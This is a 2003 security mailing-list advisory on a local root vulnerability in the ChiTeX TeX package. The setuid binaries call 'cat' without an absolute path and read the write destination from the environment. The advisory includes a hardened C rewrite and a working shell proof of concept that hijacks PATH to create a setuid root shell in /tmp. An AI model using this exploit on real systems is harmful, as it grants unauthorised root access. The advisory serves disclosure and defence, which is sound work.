[UNIX] ChiTeX Local Root Vulnerability

From: support@securiteam.com
To: list@securiteam.com
Date: 21 Apr 2003 19:27:33 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office for
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      ChiTeX Local Root Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    ChiTeX is a package for putting Chinese Big5 text into TeX/LaTeX
    documents. Working with ChiTeX is just like working with English TeX,
    apart from a few special instructions it adds. For more information
    about the package, see the homepage of the author, Chen Hung-Yih:
    http://www.math.ncu.edu.tw/~yih/intro.htm (Chinese)

    The ChiTeX package contains two setuid root binaries, chadd and
    chaddpfbname, that invoke cat through system() without an absolute
    path. A local user who controls $PATH can therefore have a program of
    their own choosing run as root.

    DETAILS

    Vulnerable systems:
     * ChiTeX version 6.1.2p7.8-1

    The setuid root binaries chadd and chaddpfbname contain the following
    system() calls:

    chadd:
    system("cat special.tmp >> $TEXMF/fontname/special.map");

    chaddpfbname:
    system("cat psfontsmap@ >> $psfontsmap");
    system("cat psfontsmap@ >> $pdftexmap");

    As you can see, cat is invoked without a full path. system() hands the
    command to /bin/sh, which resolves 'cat' against the caller's $PATH. If
    a user creates a file called 'cat' in /tmp, puts /tmp at the front of
    $PATH and then runs chadd or chaddpfbname, that file is executed with
    root privileges.

    Independently of the PATH problem, the destination of each redirection
    ($TEXMF, $psfontsmap, $pdftexmap) is expanded by the shell from the
    caller's environment as well. A user can therefore create a file named
    'psfontsmap@' and let chaddpfbname append its content, as root, to any
    file named in the $psfontsmap or $pdftexmap environment variable.
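    The two root causes side by side, as an added example that is not part
    of this advisory or of ChiTeX: the reported system() pattern in a
    comment, next to a hardened append that copies the file in-process (no
    shell, so no $PATH lookup) and refuses any destination outside a root
    directory the program picks itself rather than reading from the
    environment. The function names (dst_allowed, safe_append, demo), the
    temporary root under /tmp and the map entries are assumptions
    constructed for the example.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Vulnerable pattern reported for chadd / chaddpfbname:
 *     system("cat psfontsmap@ >> $psfontsmap");
 * /bin/sh resolves 'cat' through the caller's $PATH and expands the
 * destination from the caller's environment.  The hardened version copies
 * in-process (no shell, no PATH lookup) and writes only under a root
 * directory chosen by the program, never by the caller. */

/* Lexical check: dst must be root + "/" + a relative path without empty,
 * "." or ".." components.  Returns 1 if allowed, 0 otherwise.  Symlinks are
 * left to O_NOFOLLOW and a root-owned, non-world-writable tree. */
int dst_allowed(const char *root, const char *dst)
{
    size_t rl = strlen(root);
    if (rl == 0 || strncmp(dst, root, rl) != 0 || dst[rl] != '/')
        return 0;
    for (const char *p = dst + rl + 1;; p = strchr(p, '/') + 1) {
        const char *slash = strchr(p, '/');
        size_t len = slash ? (size_t)(slash - p) : strlen(p);
        if (len == 0 || (len == 1 && p[0] == '.') ||
            (len == 2 && p[0] == '.' && p[1] == '.'))
            return 0;
        if (!slash)
            return 1;
    }
}

/* Append src to dst without a shell.  root is the only directory the
 * program will write under (compiled in or read from a root-owned config
 * in a real fix).  Returns 0 on success, -1 on error with errno set. */
int safe_append(const char *root, const char *src, const char *dst)
{
    if (!dst_allowed(root, dst)) {
        errno = EACCES;
        return -1;
    }
    int in = open(src, O_RDONLY | O_NOFOLLOW);
    if (in < 0)
        return -1;
    int out = open(dst, O_WRONLY | O_APPEND | O_NOFOLLOW);
    if (out < 0) {
        close(in);
        return -1;
    }
    char buf[4096];
    ssize_t n = 0, off, w;
    int rc = 0;
    while (rc == 0 && (n = read(in, buf, sizeof buf)) > 0)
        for (off = 0; off < n && rc == 0; off += w) {
            w = write(out, buf + off, (size_t)(n - off));
            if (w < 0 && errno == EINTR) w = 0;   /* interrupted: retry */
            else if (w < 0) rc = -1;
        }
    if (n < 0)
        rc = -1;
    close(in);
    close(out);
    return rc;
}

/* Self-contained check on constructed files under a temporary root
 * (assumes /tmp is writable).  Returns 1 on the expected outcome, else 0. */
int demo(void)
{
    char root[] = "/tmp/chitex-demo-XXXXXX", src[512], dst[512], got[128] = {0};
    if (mkdtemp(root) == NULL)
        return 0;
    snprintf(src, sizeof src, "%s/psfontsmap@", root);
    snprintf(dst, sizeof dst, "%s/psfonts.map", root);
    FILE *f = fopen(src, "w");
    if (!f) return 0;
    fputs("constructed map entry\n", f);            /* constructed input */
    fclose(f);
    if (!(f = fopen(dst, "w"))) return 0;
    fputs("existing entry\n", f);
    fclose(f);
    /* The advisory's environment poisoning is inert here: neither PATH
     * nor psfontsmap is ever consulted. */
    setenv("PATH", "/tmp", 1);
    setenv("psfontsmap", "/etc/passwd", 1);
    int ok = safe_append(root, src, dst) == 0             /* legitimate */
          && safe_append(root, src, "/etc/passwd") != 0;  /* refused    */
    if (!(f = fopen(dst, "r"))) return 0;
    got[fread(got, 1, sizeof got - 1, f)] = '\0';
    fclose(f);
    ok = ok && strcmp(got, "existing entry\nconstructed map entry\n") == 0;
    unlink(src); unlink(dst); rmdir(root);
    return ok;
}

int main(void)
{
    printf("hardened append: %s\n", demo() ? "OK" : "FAILED");
    return 0;
}
```

    Build with a plain cc and run it; the demo appends under its own
    temporary root while a poisoned PATH and psfontsmap sit in the
    environment, and the attempt to append to /etc/passwd is rejected
    before any file is opened. If a setuid program ever does need to spawn
    a helper, the same discipline applies: absolute path, a sanitised
    environment, and no destination taken from the caller.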

    The script below demonstrates the vulnerability by creating a setuid
    root shell (/tmp/.sh) and the file /tmp/owned (with 'owned' as content):

    --- start ---

    #!/bin/sh
    # Proof of concept: fake 'cat' picked up via $PATH, plus an attacker-chosen $psfontsmap
    cd /tmp
    # Input file that chaddpfbname will cat into $psfontsmap
    echo 'owned' > 'psfontsmap@'
    # Destination of the append is read from the environment
    export psfontsmap=/tmp/owned
    # Fake cat, found first in $PATH and run as root: drop a setuid shell,
    # then hand over to the real cat so the append still takes place
    /bin/cat > /tmp/cat <<'EOF'
    #!/bin/sh
    /bin/cp /bin/sh /tmp/.sh
    /bin/chmod 4755 /tmp/.sh
    exec /bin/cat "$@"
    EOF
    chmod +x /tmp/cat
    export PATH="/tmp:$PATH"
    /usr/local/bin/chaddpfbname
    /tmp/.sh -c id
    /tmp/.sh

    --- stop ---

    Note that this is simple proof-of-concept code: you might have to change
    the path to chaddpfbname. If /bin/sh on the target is bash, the copied
    shell drops its effective uid on startup unless it is invoked with -p.

    Fix information:
    The author, Professor Chen Hung-Yih, was notified about this issue
    several weeks ago but unfortunately has not released a fix yet.

    Workaround: remove the setuid permission from chadd and chaddpfbname. A
    proper fix would invoke cat by absolute path (or copy the file without a
    shell at all) and stop taking the destination from the environment.

    ADDITIONAL INFORMATION

    The information has been provided by zillion <zillion@safemode.org>.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

